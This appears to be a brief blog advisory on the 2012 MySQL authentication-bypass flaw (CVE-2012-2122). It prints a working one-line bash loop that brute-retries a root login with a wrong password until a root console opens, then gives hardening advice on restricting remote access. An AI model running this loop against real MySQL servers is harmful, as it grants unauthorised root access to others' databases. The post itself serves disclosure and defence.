A Great Pickup-line for MySQL

On Sunday an exploit got released that allows you to by-pass the authentication procedure in certain MySQL installations.The bug that is being exploited here allows you to login without a correct password.

In short: The vulnerability makes it possible to exploit a MySQL system using a single bash script line:

for i in `seq 1 1000`; do mysql -u root --password=incorrect-password -h 127.0.0.1 2>/dev/null; done

If successful, this command will give you a mysql console (mysql>). In this case with root privs.

By default MySQL does not allow connections from external systems. If you changed this make sure you specify who is allowed to connect to your service. The best way to control this is by setting up your iptables. White-list IP addresses that you allow to connect to your system/service. Also, if there is no need for external systems to connect to your MySQL service (mostly the case when running MySQL for a website; exception excluded) than this – external access – should be disabled. Only allow access to your MySQL service from localhost/127.0.0.1

This exploit is childsplay and it wouldn’t surprise me if we are going to see a lot of compromised systems over-night. Make sure your system is not one of them!

More information about the flaw can be found at: https://community.rapid7.com/community/metasploit/blog/2012/06/11/cve-2012-2122-a-tragically-comedic-security-flaw-in-mysql

Cheers.

Comments